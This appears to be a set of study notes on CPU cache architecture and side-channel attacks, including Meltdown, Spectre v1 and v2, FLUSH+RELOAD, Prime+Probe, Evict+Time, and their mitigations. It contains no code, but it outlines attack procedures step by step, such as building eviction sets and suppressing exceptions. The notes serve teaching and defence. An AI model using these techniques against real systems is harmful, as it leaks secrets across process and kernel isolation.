cpus.md (9324B)
1 +++ 2 title = 'CPUs' 3 +++ 4 # CPUs 5 ## CPU caches 6 Caches: add fast-path access to memory 7 - shared across programs like memory 8 - great for performance, bad for security 9 10 Basic RELOAD attack: you can determine which function is being executed using a timing side channel -- a function that was already executed will be in the cache, so faster. 11 12 Important properties: 13 - size: three levels, with L1 smallest and L3 largest (shared across all cores) 14 - inclusivity: a line in level X also in X+1 15 16 Addressing: 17 - caches divided in sets, each address can only go to its own set 18 - cache line lookup on memory access: 19 - if present, hit. if not, miss → fill it in. 20 - if set full, replace 21 - replacement policy: most often least recently used 22 - reverse engineering the policy: 23 - implement simulator for textbook replacement policies 24 - run accesses through simulator & real caches 25 - compare hit and misses to find best policy match 26 - indexing: policy to select target cache set given memory address 27 - tagging: how to select cache line within cache set given memory address 28 - practical implementations use physical address to identify cache line in set (tag) 29 - virtual address have problems: e.g. multiple virtual addresses map to single physical address, or vice versa 30 - L1: VIPT (virt index, phys tag), 64 sets, 8 ways. bits 6-11 decide the set, shared between virt and phys page. 31 - L2: PIPT, 1024 sets, 4 ways. bits 6-14 decide set 32 - L3: sliced PIPT, 2048 sets per core, 16 ways, bits 6-16 decide set 33 - L3 is partitioned in slices, one per core, accessed via ring bus 34 35 ## Timing cache attack 36 Threat model 37 - control of victim: measurement is synchronous, but assumes we can control and time when victim executes 38 - no control: fewer assumptions on attacker, but measurement is async 39 40 Flushing the cache: `clflush` (x86) 41 - flushes given memory location in entire cache hierarchy 42 - if attacker doesn't have access to target memory location, need more sophisticated cache eviction strategy 43 44 Observing cache activity: FLUSH+RELOAD 45 - threat model: victim and attacker share target code/data 46 - attacker can selectively flush a desired shared location from cache, then reload the target location 47 - measuring access times, can determine whether the victim accesses a memory address 48 49 ## Cache attacks on hardware - out-of-order execution 50 for FLUSH+RELOAD, victim hardware unit must: 51 - use cache 52 - share memory with attacker-controlled software 53 - must access secrets 54 55 covert channel: both parties controlled by attacker 56 57 Rogue Data Cache Load (Meltdown): flush+reload attack 58 - user process accesses kernel memory location 59 - MMU raises exception and page fault handler kills off process 60 - but out-of-order execution (OoOE) read secret and filled cache line 61 - the reload 'sees' the filled cache line in the timing difference 62 - avoiding termination: transactional memory (TSX) suppresses exceptions, use that 63 - reducing noise: prefetcher in OoOE may fill extra cache lines, but usually doesn't operate across pages. also randomize accesses during reload state. 64 65 Mitigating Meltdown: 66 - KPTI: kernel page table isolation. don't map the kernel into user space, only some small part to switch to kernel space. 67 - but very expensive -- better to fix in silicon 68 69 ## Transient execution attacks 70 Branch prediction unit: avoids pipeline stalls using speculative execution 71 - pipeline stalls normally slow down execution 72 - speculative execution runs some instructions in a branch, which may be rolled back 73 - branch target buffer stores source addresses and history of the branch 74 - speculative execution can have many levels of nesting 75 76 After branch prediction: 77 - correct → retire after branch instruction 78 - misprediction → discard speculatively executed instructions 79 - but does not revert microarchitectural state 80 81 Spectre v1: bounds check bypass 82 - train branch predictor at given program location to go to a specific branch 83 - flush data that controls the branch 84 - give the target branch an input that makes it go the other way 85 - you need a gadget that accesses data out of bounds and transfers it to a variable 86 - can generalize Meltdown -- leak from any array offset 87 - can suppress exception with branch misprediction 88 89 Mitigations for Spectre v1: 90 - `lfence` stops speculation 91 - but: serializes all loads in pipeline, so costly up to 2x overhead (though there are optimizations) 92 - other instructions stop speculation, e.g. instructions to toggle SMAP 93 - pointer/index masking on array access, so index can't go out of bounds 94 - requires manual annotations in Linux kernel 95 - low-resolution timers (but attackers can find other timer, or amplify signal by repeating) 96 - process-based site isolation (different websites are in their own process) 97 - assumes process isolation can't be breached 98 99 Spectre v2: branch target injection 100 - branch target buffer stores call target predictions (in another partition) 101 - train branch prediction for a certain path 102 - call in some context, the trained branch will be speculatively executed 103 - attacker can train predictor in their address space 104 - victim then mispredicts in their address space, calls into attacker-controlled address → ROP in speculative execution 105 - when e.g. address spaces don't overlap, can't easily train for specific virtual address. can still abuse collisions in branch target buffer 106 - BTB uses a few bits in the virtual address to select an entry 107 108 Mitigations for Spectre v2: 109 - Intel initially released microcode update with instructions to partially flush BTB 110 - OS vendors did not adopt it 111 - Retpoline: compiler-based, turns indirect calls into returns, predicted with Return Stack Buffer 112 - goal: redirect speculation to safe landing pad 113 - `ret` predictor assumes we are returning to first instruction after last call, which contains an infinite loop with an `lfence` 114 - problems: 115 - indirect calls don't actually speculate, which is slow 116 - on recent microarchitectures, if RSB is empty, predictor uses BTB, enabling attacks 117 - options: "stuff" RSB with special entries, or use eIBRS (BTB partitioned across privilege levels & hyperthreads) 118 119 Other applications of transient/speculative execution 120 - ExSpectre: craft shadow `memcpy` -- one that transfers memory between addresses, but its data flows are hidden in speculative execution 121 - BlindSide: BROP attack against kernel, buffer overflow without exceptions (suppressed by speculative execution) 122 123 ## Advanced cache attacks 124 Limitations of flush+reload: 125 - need `clflush` instruction access (not in JavaScript or ARM) 126 - need shared memory, not in e.g. in-kernel Spectre 127 - relies on timing, not in e.g. sandbox forbidding access to timers 128 - causes cache misses on victim execution 129 130 Eviction-based attacks: 131 - goal: no `clflush` and shared memory 132 - monitor cache sets instead of cache lines, use 1 eviction set to monitor 1 victim cache set 133 - eviction set: given a target cache set, it's a set of memory addresses that, if accessed, will evict any other entry in the set 134 135 Building eviction set for L1: 136 - 1 eviction set for each cache set in L1 137 - build eviction sets for all cache sets → can monitor L1 for victim accesses 138 - L1: 64 sets (within 4KB page, we have 64 cache lines, each belonging to different color (cache set)). 139 - 8 ways (we need 8 4KB pages, need to access first cache line of these pages to fill entire red cache set). 140 141 Building an eviction set for L2: 142 1. Allocate large pool of pages (large enough to cover all cache sets and ways of target cache) 143 2. Pick page P from pool 144 3. Check that accessing first cache line of all other pages evicts first cache line of P 145 4. Pick page Q from pool and remove it. See if pool without Q still evicts P. If yes, remove Q from pool. 146 5. Keep removing pages until pool has exactly 4 members. This is eviction set for P (64 sets). 147 6. Try this again with page that eviction set for P doesn't does not evict to find another eviction set. 148 149 In L1 and L2, cache sets will be striped throughout memory. 150 But because L3 is sliced, the distribution will be chaotic. 151 However, the same eviction set algorithm also works for L3, because no assumptions are made on physical addresses. 152 153 Prime+probe attack: 154 - attacker does not control victim, code/data not shared 155 - steps: 156 1. Prime: Build L3 eviction sets for victim locations. Walk all eviction sets corresponding to cache sets the attacker wants to monitor. This puts the cache in a known state. 157 2. Victim accesses cache set 158 3. Probe: walk eviction set, check for speed. If slow, the attacker knows the cache set was accessed. 159 160 Evict+time: 161 - attacker controls victim, code/data not shared 162 - less noisy -- we can control execution of victim 163 - steps: 164 1. Build L3 eviction sets for victim locations. Walk all eviction sets corresponding to cache sets the attacker wants to monitor. 165 2. Craft input to interface (e.g. RPC) to talk to victim and create execution of victim that performs secret-dependent computation 166 3. Time execution of victim under its control, and if slow, the victim accessed the cache set 167 - as an attack against the MMU, trigger page table walk of MMU and time the accesses 168 - MMU accesses CPU caches because address translation is frequent and costly 169 - AnC needs to trigger victim page table walks, at least flush TLB (evict entries in TLB with eviction sets)